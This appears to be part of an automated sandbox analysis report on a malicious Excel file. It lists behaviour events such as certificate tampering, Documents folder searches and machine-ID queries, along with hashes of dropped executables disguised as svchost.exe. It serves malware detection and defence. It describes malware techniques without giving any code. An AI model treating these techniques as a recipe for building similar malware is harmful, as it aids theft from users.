Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 24_2_00AD079A GetUserNameA,

24_2_00AD079A

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Jump to behavior

Stealing of Sensitive Information:

Searches for user specific document files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

ID:	335896
Product:	CloudBasic
Start time:	19:14:25
Start date:	04.01.2021
Sample:	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	4468e0175c68f3751fc2027f1e42ca0c
SHA1:	c19aff367853c61d750b2da47623b69d8c1b42bb
SHA256:	4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
Filetype:	Microsoft Excel sheet (30009/1) 47.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 58936 bytes, 1 file	E4F1E21910443409E81E5B55DC8DE774	EC0885660BD216D0CDD5E6762B2F595376995BD0	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	05998788F56A7BBEB06542D13D8A67BC	58394F3FEAE625FDCDE3AEC69F718224AF5702DF	16BA6B0E56F32FA63BECE76B6391C039FBF6D07BB7A4ADD4BB4C923F58B5F654
C:\Users\user\AppData\Local\Temp\Cab2C30.tmp	Microsoft Cabinet archive data, 58936 bytes, 1 file	E4F1E21910443409E81E5B55DC8DE774	EC0885660BD216D0CDD5E6762B2F595376995BD0	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
C:\Users\user\AppData\Local\Temp\F3FE0000	data	0682ADAFB9D821D49526BD1B9BE8F79A	6F0D7D7AF2D8ADB7EB0EBE342D82A34C2E7AFE9F	9292836FDDC9435A4CD9AB691E968C142E472569B377AEE62FDBCC0AC9051260
C:\Users\user\AppData\Local\Temp\Tar2C31.tmp	data	D0682A3C344DFC62FB18D5A539F81F61	09D3E9B899785DA377DF2518C6175D70CCF9DA33	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
C:\Users\user\AppData\Local\Temp\ps.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	128409D5CB9701CD12600BAF7A623794	5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB	80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
C:\Users\user\AppData\Local\Temp\tmp121B.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	92780A1AFFA6988AB747662D1E2293D4	4BD18D97C0088C7EEB8471758D2C6E7A7349D912	1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
C:\Users\user\AppData\Local\Temp\tmp71E7.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	92780A1AFFA6988AB747662D1E2293D4	4BD18D97C0088C7EEB8471758D2C6E7A7349D912	1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	92780A1AFFA6988AB747662D1E2293D4	4BD18D97C0088C7EEB8471758D2C6E7A7349D912	1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	128409D5CB9701CD12600BAF7A623794	5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB	80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Tue Jan 5 02:14:47 2021, atime=Tue Jan 5 02:14:47 2021, length=169984, window=hide	FA2A6E2DA6EFD084F9AF9B6BCD547C6E	E4E41F6DA48DD2D2827A74BB0EA6E82F87571F5A	261D5190D504802F31F824620CCA8D29F2B8677F6895E21B1755A14061F8F41B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 02:14:47 2021, atime=Tue Jan 5 02:14:47 2021, length=8192, window=hide	9361E5A65C51A7C5C90F42A03D65733F	AC2C57F74A6D0FED78EB8A94F1C42D326C23469C	ACDCB45365D2A555051BB311BFB8DF401C753C9712C2F06EEEE5A81054D0382F
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	B069F1433E95E0835A5F47849C80D569	8B9AD65811CDC72E61AD5EAA96D3DCBD1DCC7ED1	FEB8EF8DE63A557979BF3DDABA8A6060BADAF7D1AB1143A6AA1F47DF70876858
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0GIXF82C.txt	ASCII text	25DF76F2320E2DC6D352763F9ABC0581	13E2D554264F509E1DE6CB00A369460CC9954728	C3C8CCD630DD46300F6746D2E57DEC07ACB09670F204E8862FA47FE9517F2FA2
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G7VTE4BUJJVJ02GNE19I.temp	data	6B364979C8767D2424D3C91EBDD89DCD	86CAAFAD50B9238F8458D82DE0730886D50B337F	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NZDSA84RF84J59JBFTNC.temp	data	6B364979C8767D2424D3C91EBDD89DCD	86CAAFAD50B9238F8458D82DE0730886D50B337F	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PB6OHLZ29ZGVS9S1BE0R.temp	data	6B364979C8767D2424D3C91EBDD89DCD	86CAAFAD50B9238F8458D82DE0730886D50B337F	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PFQODHVM4U1PD38F6YPM.temp	data	6B364979C8767D2424D3C91EBDD89DCD	86CAAFAD50B9238F8458D82DE0730886D50B337F	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TWOJT3O669AH3AZCWTO6.temp	data	6B364979C8767D2424D3C91EBDD89DCD	86CAAFAD50B9238F8458D82DE0730886D50B337F	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z32BQNYTSAI4D5J8YUSI.temp	data	6B364979C8767D2424D3C91EBDD89DCD	86CAAFAD50B9238F8458D82DE0730886D50B337F	DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
C:\Users\user\AppData\Roaming\svchost.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	128409D5CB9701CD12600BAF7A623794	5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB	80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
C:\Users\user\Desktop\D4FE0000	Applesoft BASIC program data, first line number 16	C9EFF753C7AD61E408A9718A39AC6610	07886DA6E870BEA6D4DF13604118738425C2BF96	B63C6383D9DEEA0537ACE46015AE1708A96815435D480BCB225D00BE272AD9D3
C:\Users\user\Documents\pd.bat	ASCII text, with very long lines, with CRLF line terminators	384D01463EABC7A8F4D815862000360D	2876CE40F37588B4AF437DDFC9A62FC46F4B4296	F74736334D05832FD555A83F49C920A36580FD328792973B76EBAC6FC1A1A76C

Analysis Report 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs